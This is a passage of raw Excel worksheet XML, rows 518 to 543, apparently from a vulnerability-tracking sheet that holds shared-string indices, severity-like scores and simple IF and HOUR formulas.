      <c r="U518" s="4"/>
      <c r="V518" s="7"/>
    </row>
    <row r="519" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A519" s="3" t="s">
        <v>1902</v>
      </c>
      <c r="B519" s="4" t="s">
        <v>2886</v>
      </c>
      <c r="C519" s="4" t="s">
        <v>2887</v>
      </c>
      <c r="D519" s="4" t="s">
        <v>2888</v>
      </c>
      <c r="E519" s="4" t="s">
        <v>2889</v>
      </c>
      <c r="F519" s="4" t="s">
        <v>2890</v>
      </c>
      <c r="G519" s="4" t="s">
        <v>2891</v>
      </c>
      <c r="H519" s="4">
        <v>4.3</v>
      </c>
      <c r="I519" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J519" s="4"/>
      <c r="K519" s="4"/>
      <c r="L519" s="4">
        <f>IF(out!$G519="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M519" s="4"/>
      <c r="N519" s="4"/>
      <c r="O519" s="13"/>
      <c r="P519" s="4"/>
      <c r="Q519" s="13">
        <f>HOUR(out!$P519 -out!$N519)</f>
        <v>0</v>
      </c>
      <c r="R519" s="18"/>
      <c r="S519" s="4"/>
      <c r="T519" s="4"/>
      <c r="U519" s="4"/>
      <c r="V519" s="7"/>
    </row>
    <row r="520" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A520" s="3" t="s">
        <v>2892</v>
      </c>
      <c r="B520" s="4" t="s">
        <v>2893</v>
      </c>
      <c r="C520" s="4" t="s">
        <v>2894</v>
      </c>
      <c r="D520" s="4" t="s">
        <v>2895</v>
      </c>
      <c r="E520" s="4" t="s">
        <v>2896</v>
      </c>
      <c r="F520" s="4" t="s">
        <v>2897</v>
      </c>
      <c r="G520" s="4" t="s">
        <v>2898</v>
      </c>
      <c r="H520" s="4">
        <v>6.8</v>
      </c>
      <c r="I520" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J520" s="4"/>
      <c r="K520" s="4"/>
      <c r="L520" s="4">
        <f>IF(out!$G520="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M520" s="4"/>
      <c r="N520" s="4"/>
      <c r="O520" s="13"/>
      <c r="P520" s="4"/>
      <c r="Q520" s="13">
        <f>HOUR(out!$P520 -out!$N520)</f>
        <v>0</v>
      </c>
      <c r="R520" s="18"/>
      <c r="S520" s="4"/>
      <c r="T520" s="4"/>
      <c r="U520" s="4"/>
      <c r="V520" s="7"/>
    </row>
    <row r="521" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A521" s="3" t="s">
        <v>2899</v>
      </c>
      <c r="B521" s="4" t="s">
        <v>2900</v>
      </c>
      <c r="C521" s="4" t="s">
        <v>2901</v>
      </c>
      <c r="D521" s="4" t="s">
        <v>2902</v>
      </c>
      <c r="E521" s="4" t="s">
        <v>2903</v>
      </c>
      <c r="F521" s="4" t="s">
        <v>2904</v>
      </c>
      <c r="G521" s="4" t="s">
        <v>2905</v>
      </c>
      <c r="H521" s="4">
        <v>4.3</v>
      </c>
      <c r="I521" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J521" s="4"/>
      <c r="K521" s="4"/>
      <c r="L521" s="4">
        <f>IF(out!$G521="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M521" s="4"/>
      <c r="N521" s="4"/>
      <c r="O521" s="13"/>
      <c r="P521" s="4"/>
      <c r="Q521" s="13">
        <f>HOUR(out!$P521 -out!$N521)</f>
        <v>0</v>
      </c>
      <c r="R521" s="18"/>
      <c r="S521" s="4"/>
      <c r="T521" s="4"/>
      <c r="U521" s="4"/>
      <c r="V521" s="7"/>
    </row>
    <row r="522" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A522" s="3" t="s">
        <v>2906</v>
      </c>
      <c r="B522" s="4" t="s">
        <v>2907</v>
      </c>
      <c r="C522" s="4" t="s">
        <v>2908</v>
      </c>
      <c r="D522" s="4" t="s">
        <v>2909</v>
      </c>
      <c r="E522" s="4" t="s">
        <v>2910</v>
      </c>
      <c r="F522" s="4" t="s">
        <v>2911</v>
      </c>
      <c r="G522" s="4" t="s">
        <v>2912</v>
      </c>
      <c r="H522" s="4">
        <v>3.1</v>
      </c>
      <c r="I522" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J522" s="4"/>
      <c r="K522" s="4"/>
      <c r="L522" s="4">
        <f>IF(out!$G522="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M522" s="4"/>
      <c r="N522" s="4"/>
      <c r="O522" s="13"/>
      <c r="P522" s="4"/>
      <c r="Q522" s="13">
        <f>HOUR(out!$P522 -out!$N522)</f>
        <v>0</v>
      </c>
      <c r="R522" s="18"/>
      <c r="S522" s="4"/>
      <c r="T522" s="4"/>
      <c r="U522" s="4"/>
      <c r="V522" s="7"/>
    </row>
    <row r="523" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A523" s="3" t="s">
        <v>2913</v>
      </c>
      <c r="B523" s="4" t="s">
        <v>2914</v>
      </c>
      <c r="C523" s="4" t="s">
        <v>2915</v>
      </c>
      <c r="D523" s="4" t="s">
        <v>2916</v>
      </c>
      <c r="E523" s="4" t="s">
        <v>2917</v>
      </c>
      <c r="F523" s="4" t="s">
        <v>2918</v>
      </c>
      <c r="G523" s="4" t="s">
        <v>2919</v>
      </c>
      <c r="H523" s="4">
        <v>8.1999999999999993</v>
      </c>
      <c r="I523" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J523" s="4"/>
      <c r="K523" s="4"/>
      <c r="L523" s="4">
        <f>IF(out!$G523="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M523" s="4"/>
      <c r="N523" s="4"/>
      <c r="O523" s="13"/>
      <c r="P523" s="4"/>
      <c r="Q523" s="13">
        <f>HOUR(out!$P523 -out!$N523)</f>
        <v>0</v>
      </c>
      <c r="R523" s="18"/>
      <c r="S523" s="4"/>
      <c r="T523" s="4"/>
      <c r="U523" s="4"/>
      <c r="V523" s="7"/>
    </row>
    <row r="524" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A524" s="3" t="s">
        <v>2920</v>
      </c>
      <c r="B524" s="4" t="s">
        <v>2921</v>
      </c>
      <c r="C524" s="4" t="s">
        <v>2922</v>
      </c>
      <c r="D524" s="4" t="s">
        <v>2923</v>
      </c>
      <c r="E524" s="4" t="s">
        <v>2924</v>
      </c>
      <c r="F524" s="4" t="s">
        <v>2925</v>
      </c>
      <c r="G524" s="4" t="s">
        <v>2811</v>
      </c>
      <c r="H524" s="4">
        <v>7.5</v>
      </c>
      <c r="I524" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J524" s="4"/>
      <c r="K524" s="4"/>
      <c r="L524" s="4">
        <f>IF(out!$G524="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M524" s="4"/>
      <c r="N524" s="4"/>
      <c r="O524" s="13"/>
      <c r="P524" s="4"/>
      <c r="Q524" s="13">
        <f>HOUR(out!$P524 -out!$N524)</f>
        <v>0</v>
      </c>
      <c r="R524" s="18"/>
      <c r="S524" s="4"/>
      <c r="T524" s="4"/>
      <c r="U524" s="4"/>
      <c r="V524" s="7"/>
    </row>
    <row r="525" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A525" s="3" t="s">
        <v>2926</v>
      </c>
      <c r="B525" s="4" t="s">
        <v>2927</v>
      </c>
      <c r="C525" s="4" t="s">
        <v>2928</v>
      </c>
      <c r="D525" s="4" t="s">
        <v>1958</v>
      </c>
      <c r="E525" s="4" t="s">
        <v>1959</v>
      </c>
      <c r="F525" s="4" t="s">
        <v>2929</v>
      </c>
      <c r="G525" s="4" t="s">
        <v>2930</v>
      </c>
      <c r="H525" s="4">
        <v>6.8</v>
      </c>
      <c r="I525" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J525" s="4"/>
      <c r="K525" s="4"/>
      <c r="L525" s="4">
        <f>IF(out!$G525="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M525" s="4"/>
      <c r="N525" s="4"/>
      <c r="O525" s="13"/>
      <c r="P525" s="4"/>
      <c r="Q525" s="13">
        <f>HOUR(out!$P525 -out!$N525)</f>
        <v>0</v>
      </c>
      <c r="R525" s="18"/>
      <c r="S525" s="4"/>
      <c r="T525" s="4"/>
      <c r="U525" s="4"/>
      <c r="V525" s="7"/>
    </row>
    <row r="526" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A526" s="3" t="s">
        <v>2931</v>
      </c>
      <c r="B526" s="4" t="s">
        <v>2932</v>
      </c>
      <c r="C526" s="4" t="s">
        <v>2933</v>
      </c>
      <c r="D526" s="4" t="s">
        <v>1459</v>
      </c>
      <c r="E526" s="4" t="s">
        <v>1460</v>
      </c>
      <c r="F526" s="4" t="s">
        <v>2934</v>
      </c>
      <c r="G526" s="4" t="s">
        <v>2935</v>
      </c>
      <c r="H526" s="4">
        <v>5.3</v>
      </c>
      <c r="I526" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J526" s="4"/>
      <c r="K526" s="4"/>
      <c r="L526" s="4">
        <f>IF(out!$G526="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M526" s="4"/>
      <c r="N526" s="4"/>
      <c r="O526" s="13"/>
      <c r="P526" s="4"/>
      <c r="Q526" s="13">
        <f>HOUR(out!$P526 -out!$N526)</f>
        <v>0</v>
      </c>
      <c r="R526" s="18"/>
      <c r="S526" s="4"/>
      <c r="T526" s="4"/>
      <c r="U526" s="4"/>
      <c r="V526" s="7"/>
    </row>
    <row r="527" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A527" s="3" t="s">
        <v>2936</v>
      </c>
      <c r="B527" s="4" t="s">
        <v>2937</v>
      </c>
      <c r="C527" s="4" t="s">
        <v>2938</v>
      </c>
      <c r="D527" s="4" t="s">
        <v>2939</v>
      </c>
      <c r="E527" s="4" t="s">
        <v>2940</v>
      </c>
      <c r="F527" s="4" t="s">
        <v>2941</v>
      </c>
      <c r="G527" s="4" t="s">
        <v>2942</v>
      </c>
      <c r="H527" s="4">
        <v>6.3</v>
      </c>
      <c r="I527" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J527" s="4"/>
      <c r="K527" s="4"/>
      <c r="L527" s="4">
        <f>IF(out!$G527="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M527" s="4"/>
      <c r="N527" s="4"/>
      <c r="O527" s="13"/>
      <c r="P527" s="4"/>
      <c r="Q527" s="13">
        <f>HOUR(out!$P527 -out!$N527)</f>
        <v>0</v>
      </c>
      <c r="R527" s="18"/>
      <c r="S527" s="4"/>
      <c r="T527" s="4"/>
      <c r="U527" s="4"/>
      <c r="V527" s="7"/>
    </row>
    <row r="528" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A528" s="3" t="s">
        <v>2943</v>
      </c>
      <c r="B528" s="4" t="s">
        <v>2944</v>
      </c>
      <c r="C528" s="4" t="s">
        <v>2945</v>
      </c>
      <c r="D528" s="4" t="s">
        <v>2946</v>
      </c>
      <c r="E528" s="4" t="s">
        <v>2947</v>
      </c>
      <c r="F528" s="4" t="s">
        <v>2948</v>
      </c>
      <c r="G528" s="4" t="s">
        <v>2949</v>
      </c>
      <c r="H528" s="4">
        <v>5.3</v>
      </c>
      <c r="I528" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J528" s="4"/>
      <c r="K528" s="4"/>
      <c r="L528" s="4">
        <f>IF(out!$G528="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M528" s="4"/>
      <c r="N528" s="4"/>
      <c r="O528" s="13"/>
      <c r="P528" s="4"/>
      <c r="Q528" s="13">
        <f>HOUR(out!$P528 -out!$N528)</f>
        <v>0</v>
      </c>
      <c r="R528" s="18"/>
      <c r="S528" s="4"/>
      <c r="T528" s="4"/>
      <c r="U528" s="4"/>
      <c r="V528" s="7"/>
    </row>
    <row r="529" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A529" s="3" t="s">
        <v>2950</v>
      </c>
      <c r="B529" s="4" t="s">
        <v>2951</v>
      </c>
      <c r="C529" s="4" t="s">
        <v>2952</v>
      </c>
      <c r="D529" s="4" t="s">
        <v>2953</v>
      </c>
      <c r="E529" s="4" t="s">
        <v>2954</v>
      </c>
      <c r="F529" s="4" t="s">
        <v>2955</v>
      </c>
      <c r="G529" s="4" t="s">
        <v>2956</v>
      </c>
      <c r="H529" s="4">
        <v>6.5</v>
      </c>
      <c r="I529" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J529" s="4"/>
      <c r="K529" s="4"/>
      <c r="L529" s="4">
        <f>IF(out!$G529="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M529" s="4"/>
      <c r="N529" s="4"/>
      <c r="O529" s="13"/>
      <c r="P529" s="4"/>
      <c r="Q529" s="13">
        <f>HOUR(out!$P529 -out!$N529)</f>
        <v>0</v>
      </c>
      <c r="R529" s="18"/>
      <c r="S529" s="4"/>
      <c r="T529" s="4"/>
      <c r="U529" s="4"/>
      <c r="V529" s="7"/>
    </row>
    <row r="530" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A530" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B530" s="4" t="s">
        <v>2957</v>
      </c>
      <c r="C530" s="4" t="s">
        <v>2958</v>
      </c>
      <c r="D530" s="4" t="s">
        <v>2959</v>
      </c>
      <c r="E530" s="4" t="s">
        <v>2960</v>
      </c>
      <c r="F530" s="4" t="s">
        <v>2961</v>
      </c>
      <c r="G530" s="4" t="s">
        <v>2863</v>
      </c>
      <c r="H530" s="4">
        <v>4.3</v>
      </c>
      <c r="I530" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J530" s="4"/>
      <c r="K530" s="4"/>
      <c r="L530" s="4">
        <f>IF(out!$G530="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M530" s="4"/>
      <c r="N530" s="4"/>
      <c r="O530" s="13"/>
      <c r="P530" s="4"/>
      <c r="Q530" s="13">
        <f>HOUR(out!$P530 -out!$N530)</f>
        <v>0</v>
      </c>
      <c r="R530" s="18"/>
      <c r="S530" s="4"/>
      <c r="T530" s="4"/>
      <c r="U530" s="4"/>
      <c r="V530" s="7"/>
    </row>
    <row r="531" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A531" s="3" t="s">
        <v>2962</v>
      </c>
      <c r="B531" s="4" t="s">
        <v>2963</v>
      </c>
      <c r="C531" s="4" t="s">
        <v>2964</v>
      </c>
      <c r="D531" s="4" t="s">
        <v>2965</v>
      </c>
      <c r="E531" s="4" t="s">
        <v>2966</v>
      </c>
      <c r="F531" s="4" t="s">
        <v>2967</v>
      </c>
      <c r="G531" s="4" t="s">
        <v>239</v>
      </c>
      <c r="H531" s="4">
        <v>4.2</v>
      </c>
      <c r="I531" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J531" s="4"/>
      <c r="K531" s="4"/>
      <c r="L531" s="4">
        <f>IF(out!$G531="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M531" s="4"/>
      <c r="N531" s="4"/>
      <c r="O531" s="13"/>
      <c r="P531" s="4"/>
      <c r="Q531" s="13">
        <f>HOUR(out!$P531 -out!$N531)</f>
        <v>0</v>
      </c>
      <c r="R531" s="18"/>
      <c r="S531" s="4"/>
      <c r="T531" s="4"/>
      <c r="U531" s="4"/>
      <c r="V531" s="7"/>
    </row>
    <row r="532" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A532" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B532" s="4" t="s">
        <v>2968</v>
      </c>
      <c r="C532" s="4" t="s">
        <v>2969</v>
      </c>
      <c r="D532" s="4" t="s">
        <v>2970</v>
      </c>
      <c r="E532" s="4" t="s">
        <v>2971</v>
      </c>
      <c r="F532" s="4" t="s">
        <v>2972</v>
      </c>
      <c r="G532" s="4" t="s">
        <v>2973</v>
      </c>
      <c r="H532" s="4">
        <v>5.3</v>
      </c>
      <c r="I532" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J532" s="4"/>
      <c r="K532" s="4"/>
      <c r="L532" s="4">
        <f>IF(out!$G532="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M532" s="4"/>
      <c r="N532" s="4"/>
      <c r="O532" s="13"/>
      <c r="P532" s="4"/>
      <c r="Q532" s="13">
        <f>HOUR(out!$P532 -out!$N532)</f>
        <v>0</v>
      </c>
      <c r="R532" s="18"/>
      <c r="S532" s="4"/>
      <c r="T532" s="4"/>
      <c r="U532" s="4"/>
      <c r="V532" s="7"/>
    </row>
    <row r="533" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A533" s="3" t="s">
        <v>2974</v>
      </c>
      <c r="B533" s="4" t="s">
        <v>2975</v>
      </c>
      <c r="C533" s="4" t="s">
        <v>2976</v>
      </c>
      <c r="D533" s="4" t="s">
        <v>2977</v>
      </c>
      <c r="E533" s="4" t="s">
        <v>2978</v>
      </c>
      <c r="F533" s="4" t="s">
        <v>2979</v>
      </c>
      <c r="G533" s="4" t="s">
        <v>2013</v>
      </c>
      <c r="H533" s="4">
        <v>6.5</v>
      </c>
      <c r="I533" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J533" s="4"/>
      <c r="K533" s="4"/>
      <c r="L533" s="4">
        <f>IF(out!$G533="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M533" s="4"/>
      <c r="N533" s="4"/>
      <c r="O533" s="13"/>
      <c r="P533" s="4"/>
      <c r="Q533" s="13">
        <f>HOUR(out!$P533 -out!$N533)</f>
        <v>0</v>
      </c>
      <c r="R533" s="18"/>
      <c r="S533" s="4"/>
      <c r="T533" s="4"/>
      <c r="U533" s="4"/>
      <c r="V533" s="7"/>
    </row>
    <row r="534" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A534" s="3" t="s">
        <v>2980</v>
      </c>
      <c r="B534" s="4" t="s">
        <v>2981</v>
      </c>
      <c r="C534" s="4" t="s">
        <v>2982</v>
      </c>
      <c r="D534" s="4" t="s">
        <v>2983</v>
      </c>
      <c r="E534" s="4" t="s">
        <v>2984</v>
      </c>
      <c r="F534" s="4" t="s">
        <v>2985</v>
      </c>
      <c r="G534" s="4" t="s">
        <v>2986</v>
      </c>
      <c r="H534" s="4">
        <v>7.5</v>
      </c>
      <c r="I534" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J534" s="4"/>
      <c r="K534" s="4"/>
      <c r="L534" s="4">
        <f>IF(out!$G534="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M534" s="4"/>
      <c r="N534" s="4"/>
      <c r="O534" s="13"/>
      <c r="P534" s="4"/>
      <c r="Q534" s="13">
        <f>HOUR(out!$P534 -out!$N534)</f>
        <v>0</v>
      </c>
      <c r="R534" s="18"/>
      <c r="S534" s="4"/>
      <c r="T534" s="4"/>
      <c r="U534" s="4"/>
      <c r="V534" s="7"/>
    </row>
    <row r="535" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A535" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B535" s="4" t="s">
        <v>2987</v>
      </c>
      <c r="C535" s="4" t="s">
        <v>2988</v>
      </c>
      <c r="D535" s="4" t="s">
        <v>955</v>
      </c>
      <c r="E535" s="4" t="s">
        <v>956</v>
      </c>
      <c r="F535" s="4" t="s">
        <v>2989</v>
      </c>
      <c r="G535" s="4" t="s">
        <v>2990</v>
      </c>
      <c r="H535" s="4">
        <v>5.3</v>
      </c>
      <c r="I535" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J535" s="4"/>
      <c r="K535" s="4"/>
      <c r="L535" s="4">
        <f>IF(out!$G535="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M535" s="4"/>
      <c r="N535" s="4"/>
      <c r="O535" s="13"/>
      <c r="P535" s="4"/>
      <c r="Q535" s="13">
        <f>HOUR(out!$P535 -out!$N535)</f>
        <v>0</v>
      </c>
      <c r="R535" s="18"/>
      <c r="S535" s="4"/>
      <c r="T535" s="4"/>
      <c r="U535" s="4"/>
      <c r="V535" s="7"/>
    </row>
    <row r="536" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A536" s="3" t="s">
        <v>2991</v>
      </c>
      <c r="B536" s="4" t="s">
        <v>2992</v>
      </c>
      <c r="C536" s="4" t="s">
        <v>2993</v>
      </c>
      <c r="D536" s="4" t="s">
        <v>2994</v>
      </c>
      <c r="E536" s="4" t="s">
        <v>2995</v>
      </c>
      <c r="F536" s="4" t="s">
        <v>814</v>
      </c>
      <c r="G536" s="4" t="s">
        <v>815</v>
      </c>
      <c r="H536" s="4">
        <v>7.3</v>
      </c>
      <c r="I536" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J536" s="4"/>
      <c r="K536" s="4"/>
      <c r="L536" s="4">
        <f>IF(out!$G536="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M536" s="4"/>
      <c r="N536" s="4"/>
      <c r="O536" s="13"/>
      <c r="P536" s="4"/>
      <c r="Q536" s="13">
        <f>HOUR(out!$P536 -out!$N536)</f>
        <v>0</v>
      </c>
      <c r="R536" s="18"/>
      <c r="S536" s="4"/>
      <c r="T536" s="4"/>
      <c r="U536" s="4"/>
      <c r="V536" s="7"/>
    </row>
    <row r="537" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A537" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B537" s="4" t="s">
        <v>2996</v>
      </c>
      <c r="C537" s="4" t="s">
        <v>2997</v>
      </c>
      <c r="D537" s="4" t="s">
        <v>2998</v>
      </c>
      <c r="E537" s="4" t="s">
        <v>2999</v>
      </c>
      <c r="F537" s="4" t="s">
        <v>3000</v>
      </c>
      <c r="G537" s="4" t="s">
        <v>3001</v>
      </c>
      <c r="H537" s="4">
        <v>5.3</v>
      </c>
      <c r="I537" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J537" s="4"/>
      <c r="K537" s="4"/>
      <c r="L537" s="4">
        <f>IF(out!$G537="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M537" s="4"/>
      <c r="N537" s="4"/>
      <c r="O537" s="13"/>
      <c r="P537" s="4"/>
      <c r="Q537" s="13">
        <f>HOUR(out!$P537 -out!$N537)</f>
        <v>0</v>
      </c>
      <c r="R537" s="18"/>
      <c r="S537" s="4"/>
      <c r="T537" s="4"/>
      <c r="U537" s="4"/>
      <c r="V537" s="7"/>
    </row>
    <row r="538" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A538" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B538" s="4" t="s">
        <v>3002</v>
      </c>
      <c r="C538" s="4" t="s">
        <v>3003</v>
      </c>
      <c r="D538" s="4" t="s">
        <v>776</v>
      </c>
      <c r="E538" s="4" t="s">
        <v>777</v>
      </c>
      <c r="F538" s="4" t="s">
        <v>3004</v>
      </c>
      <c r="G538" s="4" t="s">
        <v>3005</v>
      </c>
      <c r="H538" s="4">
        <v>5.3</v>
      </c>
      <c r="I538" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J538" s="4"/>
      <c r="K538" s="4"/>
      <c r="L538" s="4">
        <f>IF(out!$G538="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M538" s="4"/>
      <c r="N538" s="4"/>
      <c r="O538" s="13"/>
      <c r="P538" s="4"/>
      <c r="Q538" s="13">
        <f>HOUR(out!$P538 -out!$N538)</f>
        <v>0</v>
      </c>
      <c r="R538" s="18"/>
      <c r="S538" s="4"/>
      <c r="T538" s="4"/>
      <c r="U538" s="4"/>
      <c r="V538" s="7"/>
    </row>
    <row r="539" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A539" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B539" s="4" t="s">
        <v>3006</v>
      </c>
      <c r="C539" s="4" t="s">
        <v>3007</v>
      </c>
      <c r="D539" s="4" t="s">
        <v>3008</v>
      </c>
      <c r="E539" s="4" t="s">
        <v>3009</v>
      </c>
      <c r="F539" s="4" t="s">
        <v>3010</v>
      </c>
      <c r="G539" s="4" t="s">
        <v>3011</v>
      </c>
      <c r="H539" s="4">
        <v>7.5</v>
      </c>
      <c r="I539" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J539" s="4"/>
      <c r="K539" s="4"/>
      <c r="L539" s="4">
        <f>IF(out!$G539="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M539" s="4"/>
      <c r="N539" s="4"/>
      <c r="O539" s="13"/>
      <c r="P539" s="4"/>
      <c r="Q539" s="13">
        <f>HOUR(out!$P539 -out!$N539)</f>
        <v>0</v>
      </c>
      <c r="R539" s="18"/>
      <c r="S539" s="4"/>
      <c r="T539" s="4"/>
      <c r="U539" s="4"/>
      <c r="V539" s="7"/>
    </row>
    <row r="540" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A540" s="3" t="s">
        <v>3012</v>
      </c>
      <c r="B540" s="4" t="s">
        <v>3013</v>
      </c>
      <c r="C540" s="4" t="s">
        <v>3014</v>
      </c>
      <c r="D540" s="4" t="s">
        <v>3015</v>
      </c>
      <c r="E540" s="4" t="s">
        <v>3016</v>
      </c>
      <c r="F540" s="4" t="s">
        <v>3017</v>
      </c>
      <c r="G540" s="4" t="s">
        <v>3018</v>
      </c>
      <c r="H540" s="4">
        <v>4.9000000000000004</v>
      </c>
      <c r="I540" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J540" s="4"/>
      <c r="K540" s="4"/>
      <c r="L540" s="4">
        <f>IF(out!$G540="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M540" s="4"/>
      <c r="N540" s="4"/>
      <c r="O540" s="13"/>
      <c r="P540" s="4"/>
      <c r="Q540" s="13">
        <f>HOUR(out!$P540 -out!$N540)</f>
        <v>0</v>
      </c>
      <c r="R540" s="18"/>
      <c r="S540" s="4"/>
      <c r="T540" s="4"/>
      <c r="U540" s="4"/>
      <c r="V540" s="7"/>
    </row>
    <row r="541" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A541" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B541" s="4" t="s">
        <v>3019</v>
      </c>
      <c r="C541" s="4" t="s">
        <v>3020</v>
      </c>
      <c r="D541" s="4" t="s">
        <v>3021</v>
      </c>
      <c r="E541" s="4" t="s">
        <v>3022</v>
      </c>
      <c r="F541" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G541" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H541" s="4">
        <v>7.5</v>
      </c>
      <c r="I541" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J541" s="4"/>
      <c r="K541" s="4"/>
      <c r="L541" s="4">
        <f>IF(out!$G541="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M541" s="4"/>
      <c r="N541" s="4"/>
      <c r="O541" s="13"/>
      <c r="P541" s="4"/>
      <c r="Q541" s="13">
        <f>HOUR(out!$P541 -out!$N541)</f>
        <v>0</v>
      </c>
      <c r="R541" s="18"/>
      <c r="S541" s="4"/>
      <c r="T541" s="4"/>
      <c r="U541" s="4"/>
      <c r="V541" s="7"/>
    </row>
    <row r="542" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A542" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B542" s="4" t="s">
        <v>3023</v>
      </c>
      <c r="C542" s="4" t="s">
        <v>3024</v>
      </c>
      <c r="D542" s="4" t="s">
        <v>3025</v>
      </c>
      <c r="E542" s="4" t="s">
        <v>3026</v>
      </c>
      <c r="F542" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G542" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H542" s="4">
        <v>7.5</v>
      </c>
      <c r="I542" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J542" s="4"/>
      <c r="K542" s="4"/>
      <c r="L542" s="4">
        <f>IF(out!$G542="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M542" s="4"/>
      <c r="N542" s="4"/>
      <c r="O542" s="13"/>
      <c r="P542" s="4"/>
      <c r="Q542" s="13">
        <f>HOUR(out!$P542 -out!$N542)</f>
        <v>0</v>
      </c>
      <c r="R542" s="18"/>
      <c r="S542" s="4"/>
      <c r="T542" s="4"/>
      <c r="U542" s="4"/>
      <c r="V542" s="7"/>
    </row>
    <row r="543" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A543" s="3" t="s">
        <v>3027</v>
      </c>
      <c r="B543" s="4" t="s">
        <v>3028</v>
      </c>
      <c r="C543" s="4" t="s">
        <v>3029</v>
      </c>
      <c r="D543" s="4" t="s">
        <v>3030</v>
      </c>
      <c r="E543" s="4" t="s">
        <v>3031</v>
      </c>
      <c r="F543" s="4" t="s">
        <v>3032</v>
      </c>
      <c r="G543" s="4" t="s">
        <v>3033</v>
      </c>
      <c r="H543" s="4">
        <v>6.5</v>
      </c>
      <c r="I543" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J543" s="4"/>
      <c r="K543" s="4"/>
      <c r="L543" s="4">
        <f>IF(out!$G543="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M543" s="4"/>
      <c r="N543" s="4"/>
      <c r="O543" s="13"/>
      <c r="P543" s="4"/>
      <c r="Q543" s="13">
        <f>HOUR(out!$P543 -out!$N543)</f>
        <v>0</v>
      </c>
      <c r="R543" s="18"/>
      <c r="S543" s="4"/>
      <c r="T543" s="4"/>
